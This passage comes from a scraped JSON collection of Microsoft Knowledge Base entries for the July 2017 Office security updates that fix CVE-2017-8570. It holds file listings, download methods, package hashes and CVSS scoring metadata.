onenotelogo.contrast-white_scale-80.png| | 1345| 25-Jun-17| 04:24 \nonenotelogo.scale100.png| onenotelogo.scale-100.png| | 1636| 25-Jun-17| 04:24 \nonenotelogo.scale140.png| onenotelogo.scale-140.png| | 2268| 25-Jun-17| 04:24 \nonenotelogo.scale180.png| onenotelogo.scale-180.png| | 2945| 25-Jun-17| 04:24 \nonenotelogo.scale80.png| onenotelogo.scale-80.png| | 1398| 25-Jun-17| 04:24 \nonenotelogosmall.contrastblack_scale100.png| onenotelogosmall.contrast-black_scale-100.png| | 1097| 25-Jun-17| 04:24 \nonenotelogosmall.contrastblack_scale140.png| onenotelogosmall.contrast-black_scale-140.png| | 1311| 25-Jun-17| 04:24 \nonenotelogosmall.contrastblack_scale180.png| onenotelogosmall.contrast-black_scale-180.png| | 1803| 25-Jun-17| 04:24 \nonenotelogosmall.contrastblack_scale80.png| onenotelogosmall.contrast-black_scale-80.png| | 711| 25-Jun-17| 04:24 \nonenotelogosmall.contrastwhite_scale100.png| onenotelogosmall.contrast-white_scale-100.png| | 1099| 25-Jun-17| 04:24 \nonenotelogosmall.contrastwhite_scale140.png| onenotelogosmall.contrast-white_scale-140.png| | 1303| 25-Jun-17| 04:24 \nonenotelogosmall.contrastwhite_scale180.png| onenotelogosmall.contrast-white_scale-180.png| | 1808| 25-Jun-17| 04:24 \nonenotelogosmall.contrastwhite_scale80.png| onenotelogosmall.contrast-white_scale-80.png| | 709| 25-Jun-17| 04:24 \nonenotelogosmall.scale100.png| onenotelogosmall.scale-100.png| | 1196| 25-Jun-17| 04:24 \nonenotelogosmall.scale140.png| onenotelogosmall.scale-140.png| | 1388| 25-Jun-17| 04:24 \nonenotelogosmall.scale180.png| onenotelogosmall.scale-180.png| | 1806| 25-Jun-17| 04:24 \nonenotelogosmall.scale80.png| onenotelogosmall.scale-80.png| | 811| 25-Jun-17| 04:24 \nonenotemlogo.contrastblack_scale100.png| onenotemlogo.contrast-black_scale-100.png| | 2922| 25-Jun-17| 04:24 \nonenotemlogo.contrastblack_scale140.png| onenotemlogo.contrast-black_scale-140.png| | 4102| 25-Jun-17| 04:24 \nonenotemlogo.contrastblack_scale180.png| onenotemlogo.contrast-black_scale-180.png| | 5917| 25-Jun-17| 04:24 \nonenotemlogo.contrastblack_scale80.png| onenotemlogo.contrast-black_scale-80.png| | 2001| 25-Jun-17| 04:24 \nonenotemlogo.contrastwhite_scale100.png| onenotemlogo.contrast-white_scale-100.png| | 2890| 25-Jun-17| 04:24 \nonenotemlogo.contrastwhite_scale140.png| onenotemlogo.contrast-white_scale-140.png| | 4074| 25-Jun-17| 04:24 \nonenotemlogo.contrastwhite_scale180.png| onenotemlogo.contrast-white_scale-180.png| | 5879| 25-Jun-17| 04:24 \nonenotemlogo.contrastwhite_scale80.png| onenotemlogo.contrast-white_scale-80.png| | 2004| 25-Jun-17| 04:24 \nonenotemlogo.scale100.png| onenotemlogo.scale-100.png| | 3005| 25-Jun-17| 04:24 \nonenotemlogo.scale140.png| onenotemlogo.scale-140.png| | 4287| 25-Jun-17| 04:24 \nonenotemlogo.scale180.png| onenotemlogo.scale-180.png| | 5769| 25-Jun-17| 04:24 \nonenotemlogo.scale80.png| onenotemlogo.scale-80.png| | 2156| 25-Jun-17| 04:24 \nonenotemlogosmall.contrastblack_scale100.png| onenotemlogosmall.contrast-black_scale-100.png| | 1801| 25-Jun-17| 04:24 \nonenotemlogosmall.contrastblack_scale140.png| onenotemlogosmall.contrast-black_scale-140.png| | 2602| 25-Jun-17| 04:24 \nonenotemlogosmall.contrastblack_scale180.png| onenotemlogosmall.contrast-black_scale-180.png| | 3594| 25-Jun-17| 04:24 \nonenotemlogosmall.contrastblack_scale80.png| onenotemlogosmall.contrast-black_scale-80.png| | 1130| 25-Jun-17| 04:24 \nonenotemlogosmall.contrastwhite_scale100.png| onenotemlogosmall.contrast-white_scale-100.png| | 1790| 25-Jun-17| 04:24 \nonenotemlogosmall.contrastwhite_scale140.png| onenotemlogosmall.contrast-white_scale-140.png| | 2583| 25-Jun-17| 04:24 \nonenotemlogosmall.contrastwhite_scale180.png| onenotemlogosmall.contrast-white_scale-180.png| | 3554| 25-Jun-17| 04:24 \nonenotemlogosmall.contrastwhite_scale80.png| onenotemlogosmall.contrast-white_scale-80.png| | 1119| 25-Jun-17| 04:24 \nonenotemlogosmall.scale100.png| onenotemlogosmall.scale-100.png| | 1913| 25-Jun-17| 04:24 \nonenotemlogosmall.scale140.png| onenotemlogosmall.scale-140.png| | 2718| 25-Jun-17| 04:24 \nonenotemlogosmall.scale180.png| onenotemlogosmall.scale-180.png| | 3598| 25-Jun-17| 04:24 \nonenotemlogosmall.scale80.png| onenotemlogosmall.scale-80.png| | 1234| 25-Jun-17| 04:24 \noutlooklogo.contrastblack_scale100.png| outlooklogo.contrast-black_scale-100.png| | 1929| 25-Jun-17| 04:24 \noutlooklogo.contrastblack_scale140.png| outlooklogo.contrast-black_scale-140.png| | 3091| 25-Jun-17| 04:24 \noutlooklogo.contrastblack_scale180.png| outlooklogo.contrast-black_scale-180.png| | 4084| 25-Jun-17| 04:24 \noutlooklogo.contrastblack_scale80.png| outlooklogo.contrast-black_scale-80.png| | 1574| 25-Jun-17| 04:24 \noutlooklogo.contrastwhite_scale100.png| outlooklogo.contrast-white_scale-100.png| | 1895| 25-Jun-17| 04:24 \noutlooklogo.contrastwhite_scale140.png| outlooklogo.contrast-white_scale-140.png| | 3096| 25-Jun-17| 04:24 \noutlooklogo.contrastwhite_scale180.png| outlooklogo.contrast-white_scale-180.png| | 4096| 25-Jun-17| 04:24 \noutlooklogo.contrastwhite_scale80.png| outlooklogo.contrast-white_scale-80.png| | 1541| 25-Jun-17| 04:24 \noutlooklogo.scale100.png| outlooklogo.scale-100.png| | 2093| 25-Jun-17| 04:24 \noutlooklogo.scale140.png| outlooklogo.scale-140.png| | 3241| 25-Jun-17| 04:24 \noutlooklogo.scale180.png| outlooklogo.scale-180.png| | 4038| 25-Jun-17| 04:24 \noutlooklogo.scale80.png| outlooklogo.scale-80.png| | 1705| 25-Jun-17| 04:24 \noutlooklogosmall.contrastblack_scale100.png| outlooklogosmall.contrast-black_scale-100.png| | 1270| 25-Jun-17| 04:24 \noutlooklogosmall.contrastblack_scale140.png| outlooklogosmall.contrast-black_scale-140.png| | 1597| 25-Jun-17| 04:24 \noutlooklogosmall.contrastblack_scale180.png| outlooklogosmall.contrast-black_scale-180.png| | 2523| 25-Jun-17| 04:24 \noutlooklogosmall.contrastblack_scale80.png| outlooklogosmall.contrast-black_scale-80.png| | 918| 25-Jun-17| 04:24 \noutlooklogosmall.contrastwhite_scale100.png| outlooklogosmall.contrast-white_scale-100.png| | 1268| 25-Jun-17| 04:24 \noutlooklogosmall.contrastwhite_scale140.png| outlooklogosmall.contrast-white_scale-140.png| | 1547| 25-Jun-17| 04:24 \noutlooklogosmall.contrastwhite_scale180.png| outlooklogosmall.contrast-white_scale-180.png| | 2449| 25-Jun-17| 04:24 \noutlooklogosmall.contrastwhite_scale80.png| outlooklogosmall.contrast-white_scale-80.png| | 902| 25-Jun-17| 04:24 \noutlooklogosmall.scale100.png| outlooklogosmall.scale-100.png| | 1481| 25-Jun-17| 04:24 \noutlooklogosmall.scale140.png| outlooklogosmall.scale-140.png| | 1838| 25-Jun-17| 04:24 \noutlooklogosmall.scale180.png| outlooklogosmall.scale-180.png| | 2731| 25-Jun-17| 04:24 \noutlooklogosmall.scale80.png| outlooklogosmall.scale-80.png| | 1053| 25-Jun-17| 04:24 \npowerpntlogo.contrastblack_scale100.png| powerpntlogo.contrast-black_scale-100.png| | 1654| 25-Jun-17| 04:24 \npowerpntlogo.contrastblack_scale140.png| powerpntlogo.contrast-black_scale-140.png| | 2314| 25-Jun-17| 04:24 \npowerpntlogo.contrastblack_scale180.png| powerpntlogo.contrast-black_scale-180.png| | 3077| 25-Jun-17| 04:24 \npowerpntlogo.contrastblack_scale80.png| powerpntlogo.contrast-black_scale-80.png| | 1280| 25-Jun-17| 04:24 \npowerpntlogo.contrastwhite_scale100.png| powerpntlogo.contrast-white_scale-100.png| | 1650| 25-Jun-17| 04:24 \npowerpntlogo.contrastwhite_scale140.png| powerpntlogo.contrast-white_scale-140.png| | 2348| 25-Jun-17| 04:24 \npowerpntlogo.contrastwhite_scale180.png| powerpntlogo.contrast-white_scale-180.png| | 3059| 25-Jun-17| 04:24 \npowerpntlogo.contrastwhite_scale80.png| powerpntlogo.contrast-white_scale-80.png| | 1259| 25-Jun-17| 04:24 \npowerpntlogo.scale100.png| powerpntlogo.scale-100.png| | 1721| 25-Jun-17| 04:24 \npowerpntlogo.scale140.png| powerpntlogo.scale-140.png| | 2348| 25-Jun-17| 04:24 \npowerpntlogo.scale180.png| powerpntlogo.scale-180.png| | 3023| 25-Jun-17| 04:24 \npowerpntlogo.scale80.png| powerpntlogo.scale-80.png| | 1354| 25-Jun-17| 04:24 \npowerpntlogosmall.contrastblack_scale100.png| powerpntlogosmall.contrast-black_scale-100.png| | 1026| 25-Jun-17| 04:24 \npowerpntlogosmall.contrastblack_scale140.png| powerpntlogosmall.contrast-black_scale-140.png| | 1364| 25-Jun-17| 04:24 \npowerpntlogosmall.contrastblack_scale180.png| powerpntlogosmall.contrast-black_scale-180.png| | 1894| 25-Jun-17| 04:24 \npowerpntlogosmall.contrastblack_scale80.png| powerpntlogosmall.contrast-black_scale-80.png| | 746| 25-Jun-17| 04:24 \npowerpntlogosmall.contrastwhite_scale100.png| powerpntlogosmall.contrast-white_scale-100.png| | 1022| 25-Jun-17| 04:24 \npowerpntlogosmall.contrastwhite_scale140.png| powerpntlogosmall.contrast-white_scale-140.png| | 1307| 25-Jun-17| 04:24 \npowerpntlogosmall.contrastwhite_scale180.png| powerpntlogosmall.contrast-white_scale-180.png| | 1874| 25-Jun-17| 04:24 \npowerpntlogosmall.contrastwhite_scale80.png| powerpntlogosmall.contrast-white_scale-80.png| | 758| 25-Jun-17| 04:24 \npowerpntlogosmall.scale100.png| powerpntlogosmall.scale-100.png| | 1154| 25-Jun-17| 04:24 \npowerpntlogosmall.scale140.png| powerpntlogosmall.scale-140.png| | 1438| 25-Jun-17| 04:24 \npowerpntlogosmall.scale180.png| powerpntlogosmall.scale-180.png| | 1896| 25-Jun-17| 04:24 \npowerpntlogosmall.scale80.png| powerpntlogosmall.scale-80.png| | 874| 25-Jun-17| 04:24 \nspdesignlogo.contrastblack_scale100.png| spdesignlogo.contrast-black_scale-100.png| | 1559| 25-Jun-17| 04:24 \nspdesignlogo.contrastblack_scale140.png| spdesignlogo.contrast-black_scale-140.png| | 2383| 25-Jun-17| 04:24 \nspdesignlogo.contrastblack_scale180.png| spdesignlogo.contrast-black_scale-180.png| | 3497| 25-Jun-17| 04:24 \nspdesignlogo.contrastblack_scale80.png| spdesignlogo.contrast-black_scale-80.png| | 1298| 25-Jun-17| 04:24 \nspdesignlogo.contrastwhite_scale100.png| spdesignlogo.contrast-white_scale-100.png| | 1548| 25-Jun-17| 04:24 \nspdesignlogo.contrastwhite_scale140.png| spdesignlogo.contrast-white_scale-140.png| | 2534| 25-Jun-17| 04:24 \nspdesignlogo.contrastwhite_scale180.png| spdesignlogo.contrast-white_scale-180.png| | 3725| 25-Jun-17| 04:24 \nspdesignlogo.contrastwhite_scale80.png| spdesignlogo.contrast-white_scale-80.png| | 1298| 25-Jun-17| 04:24 \nspdesignlogo.scale100.png| spdesignlogo.scale-100.png| | 2163| 25-Jun-17| 04:24 \nspdesignlogo.scale140.png| spdesignlogo.scale-140.png| | 3058| 25-Jun-17| 04:24 \nspdesignlogo.scale180.png| spdesignlogo.scale-180.png| | 4614| 25-Jun-17| 04:24 \nspdesignlogo.scale80.png| spdesignlogo.scale-80.png| | 1745| 25-Jun-17| 04:24 \nspdesignlogosmall.contrastblack_scale100.png| spdesignlogosmall.contrast-black_scale-100.png| | 1008| 25-Jun-17| 04:24 \nspdesignlogosmall.contrastblack_scale140.png| spdesignlogosmall.contrast-black_scale-140.png| | 1278| 25-Jun-17| 04:24 \nspdesignlogosmall.contrastblack_scale180.png| spdesignlogosmall.contrast-black_scale-180.png| | 1990| 25-Jun-17| 04:24 \nspdesignlogosmall.contrastblack_scale80.png| spdesignlogosmall.contrast-black_scale-80.png| | 617| 25-Jun-17| 04:24 \nspdesignlogosmall.contrastwhite_scale100.png| spdesignlogosmall.contrast-white_scale-100.png| | 977| 25-Jun-17| 04:24 \nspdesignlogosmall.contrastwhite_scale140.png| spdesignlogosmall.contrast-white_scale-140.png| | 1193| 25-Jun-17| 04:24 \nspdesignlogosmall.contrastwhite_scale180.png| spdesignlogosmall.contrast-white_scale-180.png| | 1876| 25-Jun-17| 04:24 \nspdesignlogosmall.contrastwhite_scale80.png| spdesignlogosmall.contrast-white_scale-80.png| | 602| 25-Jun-17| 04:24 \nspdesignlogosmall.scale100.png| spdesignlogosmall.scale-100.png| | 1546| 25-Jun-17| 04:24 \nspdesignlogosmall.scale140.png| spdesignlogosmall.scale-140.png| | 1910| 25-Jun-17| 04:24 \nspdesignlogosmall.scale180.png| spdesignlogosmall.scale-180.png| | 2614| 25-Jun-17| 04:24 \nspdesignlogosmall.scale80.png| spdesignlogosmall.scale-80.png| | 1003| 25-Jun-17| 04:24 \nvisiologo.contrastblack_scale100.png| visiologo.contrast-black_scale-100.png| | 1804| 25-Jun-17| 04:24 \nvisiologo.contrastblack_scale140.png| visiologo.contrast-black_scale-140.png| | 3195| 25-Jun-17| 04:24 \nvisiologo.contrastblack_scale180.png| visiologo.contrast-black_scale-180.png| | 3478| 25-Jun-17| 04:24 \nvisiologo.contrastblack_scale80.png| visiologo.contrast-black_scale-80.png| | 1474| 25-Jun-17| 04:24 \nvisiologo.contrastwhite_scale100.png| visiologo.contrast-white_scale-100.png| | 1801| 25-Jun-17| 04:24 \nvisiologo.contrastwhite_scale140.png| visiologo.contrast-white_scale-140.png| | 3254| 25-Jun-17| 04:24 \nvisiologo.contrastwhite_scale180.png| visiologo.contrast-white_scale-180.png| | 3626| 25-Jun-17| 04:24 \nvisiologo.contrastwhite_scale80.png| visiologo.contrast-white_scale-80.png| | 1447| 25-Jun-17| 04:24 \nvisiologo.scale100.png| visiologo.scale-100.png| | 1872| 25-Jun-17| 04:24 \nvisiologo.scale140.png| visiologo.scale-140.png| | 3262| 25-Jun-17| 04:24 \nvisiologo.scale180.png| visiologo.scale-180.png| | 3403| 25-Jun-17| 04:24 \nvisiologo.scale80.png| visiologo.scale-80.png| | 1526| 25-Jun-17| 04:24 \nvisiologosmall.contrastblack_scale100.png| visiologosmall.contrast-black_scale-100.png| | 1196| 25-Jun-17| 04:24 \nvisiologosmall.contrastblack_scale140.png| visiologosmall.contrast-black_scale-140.png| | 1497| 25-Jun-17| 04:24 \nvisiologosmall.contrastblack_scale180.png| visiologosmall.contrast-black_scale-180.png| | 2675| 25-Jun-17| 04:24 \nvisiologosmall.contrastblack_scale80.png| visiologosmall.contrast-black_scale-80.png| | 848| 25-Jun-17| 04:24 \nvisiologosmall.contrastwhite_scale100.png| visiologosmall.contrast-white_scale-100.png| | 1165| 25-Jun-17| 04:24 \nvisiologosmall.contrastwhite_scale140.png| visiologosmall.contrast-white_scale-140.png| | 1453| 25-Jun-17| 04:24 \nvisiologosmall.contrastwhite_scale180.png| visiologosmall.contrast-white_scale-180.png| | 2618| 25-Jun-17| 04:24 \nvisiologosmall.contrastwhite_scale80.png| visiologosmall.contrast-white_scale-80.png| | 836| 25-Jun-17| 04:24 \nvisiologosmall.scale100.png| visiologosmall.scale-100.png| | 1285| 25-Jun-17| 04:24 \nvisiologosmall.scale140.png| visiologosmall.scale-140.png| | 1597| 25-Jun-17| 04:24 \nvisiologosmall.scale180.png| visiologosmall.scale-180.png| | 2722| 25-Jun-17| 04:24 \nvisiologosmall.scale80.png| visiologosmall.scale-80.png| | 960| 25-Jun-17| 04:24 \nwinprojlogo.contrastblack_scale100.png| winprojlogo.contrast-black_scale-100.png| | 1662| 25-Jun-17| 04:24 \nwinprojlogo.contrastblack_scale140.png| winprojlogo.contrast-black_scale-140.png| | 2705| 25-Jun-17| 04:24 \nwinprojlogo.contrastblack_scale180.png| winprojlogo.contrast-black_scale-180.png| | 3391| 25-Jun-17| 04:24 \nwinprojlogo.contrastblack_scale80.png| winprojlogo.contrast-black_scale-80.png| | 1393| 25-Jun-17| 04:24 \nwinprojlogo.contrastwhite_scale100.png| winprojlogo.contrast-white_scale-100.png| | 1698| 25-Jun-17| 04:24 \nwinprojlogo.contrastwhite_scale140.png| winprojlogo.contrast-white_scale-140.png| | 2737| 25-Jun-17| 04:24 \nwinprojlogo.contrastwhite_scale180.png| winprojlogo.contrast-white_scale-180.png| | 3396| 25-Jun-17| 04:24 \nwinprojlogo.contrastwhite_scale80.png| winprojlogo.contrast-white_scale-80.png| | 1392| 25-Jun-17| 04:24 \nwinprojlogo.scale100.png| winprojlogo.scale-100.png| | 1740| 25-Jun-17| 04:24 \nwinprojlogo.scale140.png| winprojlogo.scale-140.png| | 2642| 25-Jun-17| 04:24 \nwinprojlogo.scale180.png| winprojlogo.scale-180.png| | 3257| 25-Jun-17| 04:24 \nwinprojlogo.scale80.png| winprojlogo.scale-80.png| | 1514| 25-Jun-17| 04:24 \nwinprojlogosmall.contrastblack_scale100.png| winprojlogosmall.contrast-black_scale-100.png| | 1124| 25-Jun-17| 04:24 \nwinprojlogosmall.contrastblack_scale140.png| winprojlogosmall.contrast-black_scale-140.png| | 1430| 25-Jun-17| 04:24 \nwinprojlogosmall.contrastblack_scale180.png| winprojlogosmall.contrast-black_scale-180.png| | 2183| 25-Jun-17| 04:24 \nwinprojlogosmall.contrastblack_scale80.png| winprojlogosmall.contrast-black_scale-80.png| | 721| 25-Jun-17| 04:24 \nwinprojlogosmall.contrastwhite_scale100.png| winprojlogosmall.contrast-white_scale-100.png| | 1119| 25-Jun-17| 04:24 \nwinprojlogosmall.contrastwhite_scale140.png| winprojlogosmall.contrast-white_scale-140.png| | 1380| 25-Jun-17| 04:24 \nwinprojlogosmall.contrastwhite_scale180.png| winprojlogosmall.contrast-white_scale-180.png| | 2148| 25-Jun-17| 04:24 \nwinprojlogosmall.contrastwhite_scale80.png| winprojlogosmall.contrast-white_scale-80.png| | 711| 25-Jun-17| 04:24 \nwinprojlogosmall.scale100.png| winprojlogosmall.scale-100.png| | 1308| 25-Jun-17| 04:24 \nwinprojlogosmall.scale140.png| winprojlogosmall.scale-140.png| | 1461| 25-Jun-17| 04:24 \nwinprojlogosmall.scale180.png| winprojlogosmall.scale-180.png| | 2189| 25-Jun-17| 04:24 \nwinprojlogosmall.scale80.png| winprojlogosmall.scale-80.png| | 855| 25-Jun-17| 04:24 \nwinwordlogo.contrastblack_scale100.png| winwordlogo.contrast-black_scale-100.png| | 1668| 25-Jun-17| 04:24 \nwinwordlogo.contrastblack_scale140.png| winwordlogo.contrast-black_scale-140.png| | 1984| 25-Jun-17| 04:24 \nwinwordlogo.contrastblack_scale180.png| winwordlogo.contrast-black_scale-180.png| | 3061| 25-Jun-17| 04:24 \nwinwordlogo.contrastblack_scale80.png| winwordlogo.contrast-black_scale-80.png| | 1385| 25-Jun-17| 04:24 \nwinwordlogo.contrastwhite_scale100.png| winwordlogo.contrast-white_scale-100.png| | 1663| 25-Jun-17| 04:24 \nwinwordlogo.contrastwhite_scale140.png| winwordlogo.contrast-white_scale-140.png| | 1979| 25-Jun-17| 04:24 \nwinwordlogo.contrastwhite_scale180.png| winwordlogo.contrast-white_scale-180.png| | 3067| 25-Jun-17| 04:24 \nwinwordlogo.contrastwhite_scale80.png| winwordlogo.contrast-white_scale-80.png| | 1386| 25-Jun-17| 04:24 \nwinwordlogo.scale100.png| winwordlogo.scale-100.png| | 1784| 25-Jun-17| 04:24 \nwinwordlogo.scale140.png| winwordlogo.scale-140.png| | 2165| 25-Jun-17| 04:24 \nwinwordlogo.scale180.png| winwordlogo.scale-180.png| | 3187| 25-Jun-17| 04:24 \nwinwordlogo.scale80.png| winwordlogo.scale-80.png| | 1435| 25-Jun-17| 04:24 \nwinwordlogosmall.contrastblack_scale100.png| winwordlogosmall.contrast-black_scale-100.png| | 1152| 25-Jun-17| 04:24 \nwinwordlogosmall.contrastblack_scale140.png| winwordlogosmall.contrast-black_scale-140.png| | 1422| 25-Jun-17| 04:24 \nwinwordlogosmall.contrastblack_scale180.png| winwordlogosmall.contrast-black_scale-180.png| | 1619| 25-Jun-17| 04:24 \nwinwordlogosmall.contrastblack_scale80.png| winwordlogosmall.contrast-black_scale-80.png| | 845| 25-Jun-17| 04:24 \nwinwordlogosmall.contrastwhite_scale100.png| winwordlogosmall.contrast-white_scale-100.png| | 1156| 25-Jun-17| 04:24 \nwinwordlogosmall.contrastwhite_scale140.png| winwordlogosmall.contrast-white_scale-140.png| | 1409| 25-Jun-17| 04:24 \nwinwordlogosmall.contrastwhite_scale180.png| winwordlogosmall.contrast-white_scale-180.png| | 1605| 25-Jun-17| 04:24 \nwinwordlogosmall.contrastwhite_scale80.png| winwordlogosmall.contrast-white_scale-80.png| | 832| 25-Jun-17| 04:24 \nwinwordlogosmall.scale100.png| winwordlogosmall.scale-100.png| | 1219| 25-Jun-17| 04:24 \nwinwordlogosmall.scale140.png| winwordlogosmall.scale-140.png| | 1490| 25-Jun-17| 04:24 \nwinwordlogosmall.scale180.png| winwordlogosmall.scale-180.png| | 1706| 25-Jun-17| 04:24 \nwinwordlogosmall.scale80.png| winwordlogosmall.scale-80.png| | 881| 25-Jun-17| 04:24 \nresources.pri| resources.pri| | 47040| 25-Jun-17| 04:24 \nmso.tpn.txt.arm| mso_third_party_notices.txt| | 1814| 25-Jun-17| 04:24 \nmso.tpn.txt.x64| mso_third_party_notices.txt| | 1814| 25-Jun-17| 04:24 \nmso.tpn.txt.x86| mso_third_party_notices.txt| | 1814| 25-Jun-17| 04:24 \n \n## How to get help and support for this security update\n\nHelp for installing updates: [Windows Update FAQ](<https://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<https://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>)Propose a feature or provide feedback on Office Core: [Office User Voice portal](<https://office.uservoice.com/>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-07-11T07:00:00", "type": "mskb", "title": "Description of the security update for Office 2013: July 11, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8570"], "modified": "2017-07-11T07:00:00", "id": "KB3213555", "href": "https://support.microsoft.com/en-us/help/3213555", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-24T11:05:35", "description": "None\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>). \n \n**Note** To apply this security update, you must have the release version of [Service Pack 3 for the 2007 Microsoft Office Suite](<http://support.microsoft.com/kb/949585>) installed on the computer.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>). \n--- \n \n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB3213640>) website. \n--- \n \n### Method 3: Microsoft Download Center\n\nYou can get the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * [Download the security update KB3213640 for the 32-bit version of 2007 Microsoft Office Suite](<http://www.microsoft.com/download/details.aspx?familyid=11e460a6-673f-46ea-b6de-b5d798ca1381>) \n--- \n \n## More Information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: July 11, 2017](<https://support.microsoft.com/en-us/help/20170711>).\n\n### Security update replacement information\n\nThis security update replaces the previously released update article KB3203436.\n\n### File hash information\n\nPackage Name| Package Hash SHA 1| Package Hash SHA 2 \n---|---|--- \nmso2007-kb3213640-fullfile-x86-glb.exe| 3E1086C5468666EC8530F1C5E5EA4B8A10D65450| 4CB6A882DAFF17B58630AAB17F53A587F9846A72B463D2262D8C7B39CC67D93F \n \n### File information\n\nThe English version of this security update has the file attributes (or later file attributes) that are listed in the following table. The dates and the times for these files are listed in Coordinated Universal Time (UTC). The dates and the times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and the times may change when you perform certain operations on the files. \nFor all supported x86-based versions of 2007 Microsoft Office Suite| File identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nmso.dll| mso.dll| 12.0.6772.5000| 17,406,208| 04-Jul-2017| 02:38 \n \n## How to get help and support for this security update\n\nHelp for installing updates: [Windows Update FAQ](<https://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<https://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>)Propose a feature or provide feedback on Office Core: [Office User Voice portal](<https://office.uservoice.com/>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-07-11T07:00:00", "type": "mskb", "title": "Description of the security update for 2007 Microsoft Office Suite: July 11, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8570"], "modified": "2017-07-11T07:00:00", "id": "KB3213640", "href": "https://support.microsoft.com/en-us/help/3213640", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-24T11:05:26", "description": "None\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>). \n \n**Note** To apply this security update, you must have the release version of Office 2016 installed on the computer.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>). \n--- \n \n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB3213545>) website. \n--- \n \n### Method 3: Microsoft Download Center\n\nYou can get the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * [Download the security update KB3213545 for the 32-bit version of Office 2016](<http://www.microsoft.com/download/details.aspx?familyid=08a09e40-ffa3-4914-895b-6df525a5daa8>)\n * [Download the security update KB3213545 for the 64-bit version of Office 2016](<http://www.microsoft.com/download/details.aspx?familyid=4474e27f-e778-4ee1-8964-577eafc8fff7>) \n--- \n \n## More Information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: July 11, 2017](<https://support.microsoft.com/en-us/help/20170711>).\n\n### Security update replacement information\n\nThis security update replaces previously released security update [KB3191882](<http://support.microsoft.com/kb/3191882>).\n\n### File hash information\n\nPackage Name| Package Hash SHA 1| Package Hash SHA 2 \n---|---|--- \nmsodll302016-kb3213545-fullfile-x86-glb.exe| 